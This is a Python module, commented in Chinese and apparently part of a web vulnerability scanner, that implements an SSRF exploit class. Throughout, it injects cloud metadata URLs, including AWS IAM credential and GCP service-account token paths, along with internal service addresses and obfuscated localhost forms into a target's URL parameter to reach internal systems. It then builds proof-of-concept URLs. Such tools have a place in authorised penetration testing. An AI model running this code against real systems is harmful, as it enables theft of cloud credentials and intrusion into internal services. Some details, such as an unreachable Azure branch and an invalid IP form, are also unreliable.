527 lines
22 KiB
Python
527 lines
22 KiB
Python
#!/usr/bin/env python
|
||
# -*- coding: utf-8 -*-
|
||
|
||
"""
|
||
SSRF(服务器端请求伪造)漏洞利用模块
|
||
"""
|
||
|
||
import logging
|
||
import re
|
||
import urllib.parse
|
||
import random
|
||
import string
|
||
import socket
|
||
import json
|
||
import ipaddress
|
||
|
||
logger = logging.getLogger('xss_scanner')
|
||
|
||
class SSRFExploit:
|
||
"""SSRF漏洞利用类"""
|
||
|
||
def __init__(self, http_client):
|
||
"""
|
||
初始化SSRF漏洞利用模块
|
||
|
||
Args:
|
||
http_client: HTTP客户端对象
|
||
"""
|
||
self.http_client = http_client
|
||
|
||
# 内部服务目标
|
||
self.internal_targets = [
|
||
"127.0.0.1", # 本地主机
|
||
"localhost", # 本地主机
|
||
"0.0.0.0", # 任意地址
|
||
"10.0.0.0/8", # 私有IP A类
|
||
"172.16.0.0/12", # 私有IP B类
|
||
"192.168.0.0/16", # 私有IP C类
|
||
"169.254.169.254", # AWS元数据服务
|
||
"metadata.google.internal", # GCP元数据
|
||
"100.100.100.200", # 阿里云元数据
|
||
"169.254.169.254", # Azure元数据
|
||
"127.0.0.1:25", # SMTP
|
||
"127.0.0.1:22", # SSH
|
||
"127.0.0.1:1433", # MS SQL
|
||
"127.0.0.1:3306", # MySQL
|
||
"127.0.0.1:5432", # PostgreSQL
|
||
"127.0.0.1:6379", # Redis
|
||
"127.0.0.1:9200", # Elasticsearch
|
||
"127.0.0.1:11211", # Memcached
|
||
"127.0.0.1:27017", # MongoDB
|
||
"127.0.0.1:8500", # Consul
|
||
"127.0.0.1:2375", # Docker API
|
||
"127.0.0.1:8080", # 常见Web服务
|
||
"127.0.0.1:8000", # 常见Web服务
|
||
"127.0.0.1:5000", # 常见Web服务
|
||
"127.0.0.1:3000" # 常见Web服务
|
||
]
|
||
|
||
# 内部服务路径
|
||
self.service_paths = {
|
||
"redis": ["/", ""],
|
||
"mysql": ["/", ""],
|
||
"elasticsearch": ["/", "/_cat/indices", "/_cluster/health"],
|
||
"mongodb": ["/", "/stats"],
|
||
"memcached": ["/", ""],
|
||
"docker": ["/", "/images/json", "/containers/json"],
|
||
"etcd": ["/", "/v2/keys", "/v2/members"],
|
||
"consul": ["/v1/catalog/services", "/v1/agent/self"],
|
||
"kubernetes": ["/api/v1/pods", "/api/v1/namespaces"]
|
||
}
|
||
|
||
# 云服务商元数据URL
|
||
self.cloud_metadata_urls = {
|
||
"aws": [
|
||
"http://169.254.169.254/latest/meta-data/",
|
||
"http://169.254.169.254/latest/meta-data/local-hostname",
|
||
"http://169.254.169.254/latest/meta-data/public-hostname",
|
||
"http://169.254.169.254/latest/meta-data/local-ipv4",
|
||
"http://169.254.169.254/latest/meta-data/public-ipv4",
|
||
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"
|
||
],
|
||
"gcp": [
|
||
"http://metadata.google.internal/computeMetadata/v1/",
|
||
"http://metadata.google.internal/computeMetadata/v1/instance/hostname",
|
||
"http://metadata.google.internal/computeMetadata/v1/instance/id",
|
||
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
|
||
],
|
||
"azure": [
|
||
"http://169.254.169.254/metadata/instance?api-version=2019-06-01",
|
||
"http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01"
|
||
],
|
||
"alibaba": [
|
||
"http://100.100.100.200/latest/meta-data/",
|
||
"http://100.100.100.200/latest/meta-data/instance-id",
|
||
"http://100.100.100.200/latest/meta-data/region-id"
|
||
]
|
||
}
|
||
|
||
# IP替代表示法
|
||
self.ip_alternative_forms = {
|
||
"127.0.0.1": [
|
||
"localhost",
|
||
"127.0.1",
|
||
"127.1",
|
||
"2130706433", # 十进制表示
|
||
"0x7f000001", # 十六进制表示
|
||
"0177.0.0.01", # 八进制表示
|
||
"0177.0.0.1",
|
||
"0177.0.1",
|
||
"0177.1",
|
||
"::1", # IPv6表示
|
||
"::ffff:127.0.0.1", # IPv6 映射
|
||
"[::1]",
|
||
"[::ffff:127.0.0.1]",
|
||
"1278.1.1.1"
|
||
]
|
||
}
|
||
|
||
# SSRF绕过技术
|
||
self.ssrf_bypasses = [
|
||
"@", # URL认证绕过(user:pass@host)
|
||
"#", # URL片段
|
||
"?", # URL查询参数
|
||
"%23", # URL编码的#
|
||
"%3F", # URL编码的?
|
||
"\r\n", # CRLF注入
|
||
"%0D%0A", # URL编码的CRLF
|
||
"/.", # 目录遍历
|
||
"//" # 双斜杠
|
||
]
|
||
|
||
# 常见参数名
|
||
self.common_parameters = [
|
||
"url",
|
||
"uri",
|
||
"link",
|
||
"src",
|
||
"source",
|
||
"redirect",
|
||
"redirect_to",
|
||
"image",
|
||
"img",
|
||
"file",
|
||
"download",
|
||
"upload",
|
||
"domain",
|
||
"host",
|
||
"port",
|
||
"callback",
|
||
"return",
|
||
"return_to",
|
||
"next",
|
||
"target",
|
||
"feed",
|
||
"fetch",
|
||
"site",
|
||
"html",
|
||
"page",
|
||
"data",
|
||
"reference",
|
||
"reference_url"
|
||
]
|
||
|
||
def exploit(self, vulnerability):
|
||
"""
|
||
利用SSRF漏洞
|
||
|
||
Args:
|
||
vulnerability: 漏洞信息
|
||
|
||
Returns:
|
||
dict: 利用结果
|
||
"""
|
||
logger.info(f"尝试利用SSRF漏洞: {vulnerability['url']}")
|
||
|
||
url = vulnerability.get('url')
|
||
parameter = vulnerability.get('parameter')
|
||
payload = vulnerability.get('payload', '')
|
||
|
||
if not url or not parameter:
|
||
return {
|
||
'success': False,
|
||
'message': '缺少必要的漏洞信息(URL或参数名)',
|
||
'data': None
|
||
}
|
||
|
||
# 尝试探测内部服务
|
||
internal_services = []
|
||
successful_payloads = []
|
||
|
||
# 生成随机标记用于OAST(带外应用安全测试)
|
||
verification_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
|
||
oast_domain = f"ssrf-{verification_id}.example.com"
|
||
oast_url = f"http://{oast_domain}/"
|
||
|
||
logger.info(f"生成的OAST域名: {oast_domain}")
|
||
|
||
# 0. 首先尝试OAST探测(如果有真实的回调服务器)
|
||
if hasattr(self, 'callback_server') and self.callback_server:
|
||
logger.info("尝试使用OAST检测SSRF漏洞")
|
||
result = self._try_oast_detection(url, parameter, oast_url)
|
||
if result and result['success']:
|
||
return result
|
||
|
||
# 1. 尝试本地服务
|
||
logger.info("尝试探测本地服务")
|
||
for target in self.internal_targets[:5]: # 只尝试前5个目标
|
||
# 基本请求
|
||
result = self._try_internal_service(url, parameter, f"http://{target}")
|
||
if result and result['success']:
|
||
internal_services.append(result['data']['target'])
|
||
successful_payloads.append(result['data']['payload'])
|
||
logger.info(f"发现可访问的内部服务: {target}")
|
||
|
||
# 尝试一些端口,如果目标是IP地址
|
||
if re.match(r"^\d+\.\d+\.\d+\.\d+$", target):
|
||
for port in [80, 8080, 8000, 5000, 3000, 22, 6379]:
|
||
result = self._try_internal_service(url, parameter, f"http://{target}:{port}")
|
||
if result and result['success']:
|
||
internal_services.append(f"{target}:{port}")
|
||
successful_payloads.append(result['data']['payload'])
|
||
logger.info(f"发现可访问的内部服务: {target}:{port}")
|
||
|
||
# 2. 尝试云服务商元数据
|
||
logger.info("尝试探测云服务商元数据")
|
||
cloud_metadata = {}
|
||
for provider, urls in self.cloud_metadata_urls.items():
|
||
for metadata_url in urls[:2]: # 只尝试前2个URL
|
||
result = self._try_internal_service(url, parameter, metadata_url)
|
||
if result and result['success']:
|
||
if provider not in cloud_metadata:
|
||
cloud_metadata[provider] = []
|
||
cloud_metadata[provider].append({
|
||
'url': metadata_url,
|
||
'response': result['data'].get('response', ''),
|
||
'payload': result['data']['payload']
|
||
})
|
||
successful_payloads.append(result['data']['payload'])
|
||
logger.info(f"发现可访问的云服务商元数据: {metadata_url}")
|
||
|
||
# 3. 尝试一些IP替代表示法绕过手段(针对localhost)
|
||
logger.info("尝试使用IP替代表示法绕过")
|
||
for alt_ip in self.ip_alternative_forms["127.0.0.1"][:5]: # 只尝试前5个替代表示
|
||
result = self._try_internal_service(url, parameter, f"http://{alt_ip}")
|
||
if result and result['success']:
|
||
internal_services.append(alt_ip)
|
||
successful_payloads.append(result['data']['payload'])
|
||
logger.info(f"通过IP替代表示法可访问本地服务: {alt_ip}")
|
||
|
||
# 编译结果
|
||
if internal_services or cloud_metadata:
|
||
logger.info(f"SSRF利用成功,发现 {len(internal_services)} 个内部服务和 {len(cloud_metadata)} 个云服务商元数据")
|
||
|
||
# 选择一个最可靠的有效载荷作为PoC
|
||
poc_payload = successful_payloads[0] if successful_payloads else payload
|
||
|
||
# 构建 PoC URL
|
||
parsed_url = urllib.parse.urlparse(url)
|
||
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
|
||
query_params[parameter] = poc_payload
|
||
new_query = urllib.parse.urlencode(query_params)
|
||
poc_url = urllib.parse.urlunparse((
|
||
parsed_url.scheme,
|
||
parsed_url.netloc,
|
||
parsed_url.path,
|
||
parsed_url.params,
|
||
new_query,
|
||
parsed_url.fragment
|
||
))
|
||
|
||
return {
|
||
'success': True,
|
||
'message': 'SSRF漏洞利用成功',
|
||
'data': {
|
||
'internal_services': internal_services,
|
||
'cloud_metadata': cloud_metadata,
|
||
'successful_payloads': successful_payloads
|
||
},
|
||
'poc': poc_url
|
||
}
|
||
else:
|
||
# 如果没有直接成功,返回手动验证步骤
|
||
logger.info("无法自动确认SSRF漏洞,提供手动验证步骤")
|
||
return {
|
||
'success': False,
|
||
'message': '未能自动确认SSRF漏洞,但可能存在,请尝试手动验证',
|
||
'data': {
|
||
'parameter': parameter,
|
||
'url': url,
|
||
'oast_domain': oast_domain
|
||
},
|
||
'manual_steps': [
|
||
"1. 设置一个你控制的外部Web服务器,记录所有接收到的请求",
|
||
f"2. 构造URL: {url}?{parameter}=http://your-server.com/ssrf-test",
|
||
"3. 如果你的服务器收到来自目标服务器的请求,则确认存在SSRF漏洞",
|
||
"4. 尝试以下内部服务目标进行测试:",
|
||
" - http://localhost/",
|
||
" - http://127.0.0.1:8080/",
|
||
" - http://169.254.169.254/latest/meta-data/ (AWS元数据)",
|
||
"5. 尝试以下绕过技术:",
|
||
" - http://0177.0.0.1/ (八进制IP)",
|
||
" - http://0x7f000001/ (十六进制IP)",
|
||
" - http://2130706433/ (整数IP)"
|
||
]
|
||
}
|
||
|
||
def _try_internal_service(self, url, parameter, target_url):
|
||
"""
|
||
尝试通过SSRF访问内部服务
|
||
|
||
Args:
|
||
url: 目标URL
|
||
parameter: 参数名
|
||
target_url: 要访问的内部服务URL
|
||
|
||
Returns:
|
||
dict: 利用结果
|
||
"""
|
||
try:
|
||
logger.info(f"尝试访问内部服务: {target_url}")
|
||
|
||
# 构建SSRF测试URL
|
||
parsed_url = urllib.parse.urlparse(url)
|
||
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
|
||
query_params[parameter] = target_url
|
||
|
||
# 重建查询字符串
|
||
new_query = urllib.parse.urlencode(query_params)
|
||
new_url = urllib.parse.urlunparse((
|
||
parsed_url.scheme,
|
||
parsed_url.netloc,
|
||
parsed_url.path,
|
||
parsed_url.params,
|
||
new_query,
|
||
parsed_url.fragment
|
||
))
|
||
|
||
# 发送请求
|
||
response = self.http_client.get(new_url)
|
||
|
||
# 检查响应,查找SSRF成功的迹象
|
||
if response and response.status_code == 200:
|
||
response_text = response.text
|
||
|
||
# 检查常见的SSRF成功迹象
|
||
success_indicators = self._get_service_indicators(target_url)
|
||
for indicator in success_indicators:
|
||
if indicator in response_text:
|
||
logger.info(f"内部服务访问成功,找到特征: {indicator}")
|
||
return {
|
||
'success': True,
|
||
'message': f'成功利用SSRF漏洞访问内部服务: {target_url}',
|
||
'data': {
|
||
'target': target_url,
|
||
'parameter': parameter,
|
||
'payload': target_url,
|
||
'indicator': indicator,
|
||
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
|
||
}
|
||
}
|
||
|
||
# 如果没有找到明确的特征,检查是否有其他常见服务标识
|
||
if any(keyword in response_text.lower() for keyword in [
|
||
'apache', 'nginx', 'iis', 'server', 'service', 'redis', 'mysql',
|
||
'postgresql', 'mongodb', 'memcached', 'elasticsearch', 'forbidden', 'unauthorized',
|
||
'401', '403', 'authentication', 'password', 'login', 'admin', 'root', 'error',
|
||
'<title>', '<html>', 'json', 'xml', 'internal'
|
||
]):
|
||
logger.info(f"内部服务可能可以访问,发现常见服务标识")
|
||
return {
|
||
'success': True,
|
||
'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
|
||
'data': {
|
||
'target': target_url,
|
||
'parameter': parameter,
|
||
'payload': target_url,
|
||
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
|
||
}
|
||
}
|
||
|
||
# 如果HTTP状态码不是404,可能成功了
|
||
if response.status_code not in [404, 400, 500]:
|
||
logger.info(f"内部服务响应了非错误状态码: {response.status_code}")
|
||
return {
|
||
'success': True,
|
||
'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
|
||
'data': {
|
||
'target': target_url,
|
||
'parameter': parameter,
|
||
'payload': target_url,
|
||
'status_code': response.status_code,
|
||
'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
|
||
}
|
||
}
|
||
|
||
except Exception as e:
|
||
logger.error(f"尝试访问内部服务时出错: {str(e)}")
|
||
|
||
return None
|
||
|
||
def _try_oast_detection(self, url, parameter, callback_url):
|
||
"""
|
||
尝试使用OAST(带外应用安全测试)检测SSRF
|
||
|
||
Args:
|
||
url: 目标URL
|
||
parameter: 参数名
|
||
callback_url: 回调URL
|
||
|
||
Returns:
|
||
dict: 利用结果
|
||
"""
|
||
try:
|
||
logger.info(f"尝试OAST检测SSRF: {callback_url}")
|
||
|
||
# 构建SSRF测试URL
|
||
parsed_url = urllib.parse.urlparse(url)
|
||
query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
|
||
query_params[parameter] = callback_url
|
||
|
||
# 重建查询字符串
|
||
new_query = urllib.parse.urlencode(query_params)
|
||
new_url = urllib.parse.urlunparse((
|
||
parsed_url.scheme,
|
||
parsed_url.netloc,
|
||
parsed_url.path,
|
||
parsed_url.params,
|
||
new_query,
|
||
parsed_url.fragment
|
||
))
|
||
|
||
# 发送请求
|
||
response = self.http_client.get(new_url)
|
||
|
||
# 检查回调服务器是否收到请求(假设实现)
|
||
# 注意:这需要真实的回调服务器实现
|
||
if hasattr(self, 'check_callback') and self.check_callback(callback_url):
|
||
logger.info(f"检测到OAST回调,确认SSRF漏洞")
|
||
return {
|
||
'success': True,
|
||
'message': '通过OAST成功确认SSRF漏洞',
|
||
'data': {
|
||
'callback_url': callback_url,
|
||
'parameter': parameter
|
||
},
|
||
'poc': new_url
|
||
}
|
||
|
||
except Exception as e:
|
||
logger.error(f"尝试OAST检测时出错: {str(e)}")
|
||
|
||
return None
|
||
|
||
def _get_service_indicators(self, target_url):
|
||
"""
|
||
获取目标服务的特征指标
|
||
|
||
Args:
|
||
target_url: 目标服务URL
|
||
|
||
Returns:
|
||
list: 特征指标列表
|
||
"""
|
||
indicators = []
|
||
|
||
# 提取主机和路径
|
||
try:
|
||
parsed_url = urllib.parse.urlparse(target_url)
|
||
host = parsed_url.netloc.split(':')[0]
|
||
path = parsed_url.path
|
||
|
||
# AWS元数据服务特征
|
||
if host == '169.254.169.254':
|
||
indicators = ['ami-id', 'instance-id', 'instance-type', 'local-hostname',
|
||
'local-ipv4', 'public-hostname', 'public-ipv4', 'security-credentials']
|
||
|
||
# GCP元数据服务特征
|
||
elif host == 'metadata.google.internal':
|
||
indicators = ['instance', 'attributes', 'service-accounts', 'project',
|
||
'hostname', 'image', 'machine-type']
|
||
|
||
# Azure元数据服务特征
|
||
elif host == '169.254.169.254' and 'metadata' in path:
|
||
indicators = ['vmId', 'compute', 'network', 'osType', 'location',
|
||
'resourceGroupName', 'apiVersion']
|
||
|
||
# 阿里云元数据服务特征
|
||
elif host == '100.100.100.200':
|
||
indicators = ['instance-id', 'region-id', 'zone-id', 'vpc-id',
|
||
'private-ipv4']
|
||
|
||
# Redis服务特征
|
||
elif host == '127.0.0.1' and '6379' in target_url:
|
||
indicators = ['redis_version', 'connected_clients', 'PONG', 'ERR',
|
||
'NOAUTH', 'AUTH']
|
||
|
||
# MySQL服务特征
|
||
elif host == '127.0.0.1' and '3306' in target_url:
|
||
indicators = ['mysql', 'SQL', 'MariaDB', 'syntax', 'Access denied',
|
||
'error', 'server version']
|
||
|
||
# Elasticsearch服务特征
|
||
elif host == '127.0.0.1' and ('9200' in target_url or 'elasticsearch' in target_url):
|
||
indicators = ['cluster_name', 'nodes', 'shards', 'indices', 'lucene_version',
|
||
'version', 'elasticsearch']
|
||
|
||
# MongoDB服务特征
|
||
elif host == '127.0.0.1' and '27017' in target_url:
|
||
indicators = ['mongodb', 'databases', 'collections', 'command',
|
||
'assertion', 'not authorized']
|
||
|
||
# Docker API特征
|
||
elif host == '127.0.0.1' and ('2375' in target_url or 'docker' in target_url):
|
||
indicators = ['containers', 'images', 'volumes', 'version',
|
||
'docker', 'Config', 'Id', 'Name']
|
||
|
||
# Web服务器标识
|
||
else:
|
||
indicators = ['apache', 'nginx', 'iis', 'server', 'web server', 'title',
|
||
'html', 'body', 'login', 'admin', 'index', 'welcome',
|
||
'404', '403', '401', '500', 'error', 'not found', 'forbidden']
|
||
|
||
except Exception as e:
|
||
logger.error(f"获取服务特征指标时出错: {str(e)}")
|
||
|
||
return indicators |